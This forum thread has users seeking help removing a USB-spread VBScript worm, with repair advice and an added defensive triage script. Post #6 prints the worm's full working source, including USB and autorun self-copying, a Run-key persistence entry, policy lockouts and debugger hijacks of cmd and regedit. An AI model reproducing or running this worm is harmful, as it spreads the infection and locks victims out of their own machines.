  1. #1
    Newbie
    Hi,

    How can I remove the changes caused by a virus? Something with a double extension, *.dll.vbs??

    I used the RRT and it removed the restrictions on Run, Task Manager & Folder Options, but CMD and regedit still open with Notepad!

    I wonder, I updated my McAfee and ran a full scan on the flash drive I have inserted, but it found nothing.

    My PC was infected right after I removed the flash drive from my computer.

  2. #2
    Administrator
    Did you install the script from this article?
    http://www.raymond.cc/blog/archives/2007/07/01/stop-virus-from-running-automatically-when-you-execute-files/

    It should fix .bat, .com, .exe, .pif, .reg and .scr files. It will also re-enable your registry editor (regedit).

    Looks like you have an infected USB flash drive. Make sure you clean the virus from your USB flash drive first.

  3. #3
    Newbie
    Yes, I did. I copied the script from the page, pasted it into Notepad and saved it on my desktop, then I right-clicked it and clicked "Install". I also restarted my PC.

    But how come it is still the same? Nothing happens.
    regedit.exe and cmd still open with Notepad. Damn.

    I also ran the RRT.

  4. #4
    Administrator
    If the problem still comes back after a restart, I suspect that there is still a virus on your computer that's causing it.

    You can do this to verify.
    Install the script again. Then run regedit and go to the location:
    HKLM, Software\CLASSES\batfile\shell\open\command,,,"""%1"" %*"
    HKLM, Software\CLASSES\comfile\shell\open\command,,,"""%1"" %*"
    HKLM, Software\CLASSES\exefile\shell\open\command,,,"""%1"" %*"
    HKLM, Software\CLASSES\piffile\shell\open\command,,,"""%1"" %*"
    HKLM, Software\CLASSES\regfile\shell\open\command,,,"regedit.exe ""%1"""
    HKLM, Software\CLASSES\scrfile\shell\open\command,,,"""%1"" %*"

    Check if the value is "%1" %*. If it's correct, restart.
    Once your computer is booted up, run regedit again and check the values.

  5. #5
    Newbie
    It is STILL THE SAME.... even when I ran in safe mode and installed the script again.
    I still cannot open the registry, command prompt and msconfig.

    I restarted my PC many times to no avail. I already removed the VBScript file type in the Folder Options.

    Also, IE's title bar has a phrase, "Doomed by Bewilder".

    I DON'T want to reformat my PC. Pls help me out...

  6. #6
    Newbie
    This is the script of the virus:

    Code:
    'Sting C
    
    on error resume next
    
    dim winpath,mysource,fs,atr,flashdrive,check,mf,tf,rg,nt,sd
    
    atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe wpzcon32.dll.vbs"
    
    set fs = createobject("Scripting.FileSystemObject")
    
    set mf = fs.getfile(Wscript.ScriptFullname)
    
    dim text,size
    
    size = mf.size
    
    check = mf.drive.drivetype
    
    set text=mf.openastextstream(1,-2)
    
    do while not text.atendofstream
    
    mysource=mysource&text.readline
    
    mysource=mysource & vbcrlf
    
    loop
    
    do
    
    Set winpath = fs.getspecialfolder(0)
    
    set tf = fs.getfile(winpath & "\wpzcon32.dll.vbs")
    
    tf.attributes = 32
    
    set tf=fs.createtextfile(winpath & "\wpzcon32.dll.vbs",2,true)
    
    tf.write mysource
    
    tf.close
    
    set tf = fs.getfile(winpath & "\wpzcon32.dll.vbs")
    
    tf.attributes = 39
    
    for each flashdrive in fs.drives
    
    If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
    
    set tf=fs.getfile(flashdrive.path &"\wpzcon32.dll.vbs")
    
    tf.attributes =32
    
    set tf=fs.createtextfile(flashdrive.path &"\wpzcon32.dll.vbs",2,true)
    
    tf.write mysource
    
    tf.close
    
    set tf=fs.getfile(flashdrive.path &"\wpzcon32.dll.vbs")
    
    tf.attributes =39
    
    set tf =fs.getfile(flashdrive.path &"\autorun.inf")
    
    tf.attributes = 32
    
    set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
    
    tf.write atr
    
    tf.close
    
    set tf =fs.getfile(flashdrive.path &"\autorun.inf")
    
    tf.attributes=39
    
    end if
    
    next
    
    set rg = createobject("WScript.Shell")
    
    rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WPZCON32",winpath&"\wpzcon32.dll.vbs"
    
    rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Doomed by Bewilder"
    
    rg.regwrite "HKEY_CURRENT_USER\vbsfile\DefaultIcon","shell32.dll,2"
    
    rg.regwrite "HKEY_CLASSES_ROOT\vbsfile\DefaultIcon","shell32.dll,2"
    
    rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun","1","REG_DWORD"
    
    rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden","0","REG_DWORD"
    
    rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind","1","REG_DWORD"
    
    rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions","1","REG_DWORD"
    
    rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun","1","REG_DWORD"
    
    rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","1","REG_DWORD"
    
    rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","1","REG_DWORD"
    
    rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger","notepad.exe"
    
    rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger","notepad.exe"
    
    rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger","notepad.exe"
    
    rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger","notepad.exe"
    
    rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger","notepad.exe"
    
    rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger","notepad.exe"
    
    rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger","notepad.exe"
    
    rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization", "Don't Worry... Be Happy..."
    
    rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner","Bewilder"
    
    rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\LegalNoticeCaption","Bewilder"
    
    rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\LegalNoticeText","Doomed by Bewilder"
    
    if check <> 1 then
    
    Wscript.sleep 200000
    
    end if
    
    loop while check<>1
    
    set sd = createobject("Wscript.shell")
    
    sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname
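
Added example, not part of the thread or of any poster's code: a static triage of the registry writes in the script quoted in post #6, sorting each into autorun, policy restriction, Image File Execution Options debugger hijack or branding change, and producing a `reg delete` command for the first three. The sample lines are copied from the post; the function names and category labels are assumptions of this example.

```python
import re

# Lines copied from the script quoted in post #6 (a subset of its registry writes).
SAMPLE = r'''
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WPZCON32",winpath&"\wpzcon32.dll.vbs"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Doomed by Bewilder"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","1","REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","1","REG_DWORD"
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger","notepad.exe"
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger","notepad.exe"
'''

# WScript.Shell RegWrite: a path without a trailing backslash names a value,
# so the last component is the value name and the rest is the key.
REGWRITE = re.compile(r'\.regwrite\s+"([^"]+)"\s*,\s*(.*)', re.IGNORECASE)

def classify(path):
    """Category labels are this example's own, not an established taxonomy."""
    p = path.lower()
    if "\\image file execution options\\" in p and p.endswith("\\debugger"):
        return "ifeo-debugger"   # launching the named program starts the debugger instead
    if "\\currentversion\\run\\" in p:
        return "autorun"         # starts the script at every logon
    if "\\policies\\" in p:
        return "policy"          # Run, Task Manager, regedit and folder-option restrictions
    return "branding"            # title bar, owner and legal-notice strings

def triage(script_text):
    findings = []
    for line in script_text.splitlines():
        m = REGWRITE.search(line)
        if not m:
            continue
        key, _, value = m.group(1).rpartition("\\")
        kind = classify(m.group(1))
        # Branding strings are only reported: their original data is not known.
        fix = None if kind == "branding" else f'reg delete "{key}" /v "{value}" /f'
        findings.append({"kind": kind, "key": key, "value": value,
                         "data": m.group(2).strip(), "fix": fix})
    return findings

def hijacked_programs(findings):
    """Executables redirected through an IFEO Debugger value."""
    return sorted(f["key"].rsplit("\\", 1)[-1]
                  for f in findings if f["kind"] == "ifeo-debugger")

if __name__ == "__main__":
    for f in triage(SAMPLE):
        print(f["kind"], f["fix"] or "review manually: " + f["value"])
```

The `Debugger` values under Image File Execution Options are what send cmd.exe and regedit.exe to Notepad, which a file-association fix does not touch. The quoted script's loop rewrites every value each 200000 ms while its wscript.exe process is alive, so that process has to be ended before the deletions will hold.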

  7. #7
    Administrator
    Why can't I find any information about this Bewilder virus?
    nailv, may I know where you got that code from?

  8. #8
    Newbie
    I found it on C: of my colleague's PC. The virus was actually from removable flash drives.

    I think every USB flash drive is dwelled in by viruses, usually written in VBScript.
    Damn.

    Edit: Whew! At last! I've fixed it already.

    Thanks to the expert folks on other forums.

  9. #9
    Newbie
    Hi Raymond. I think I have the same problem with my laptop :( . The title bar on my Internet Explorer has a "Doomed by Bewilder" thing. And the Notepad thing too. I've already fixed the Task Manager. Pls help me, I am desperately needing your help, Raymond, 'cause I'm a noob in computers. I cannot understand those complicated instructions that you have already given to fix my problems. What should I do? Pls help me by instructing me step by step what to do. Thanks Raymond :)

  10. #10
    Experienced User
    Try downloading winsecret from the freebies giveaway topic in Latest Releases, and when you have finished downloading it, run it, go to Applications, and you can change the title in Internet Explorer.

 

 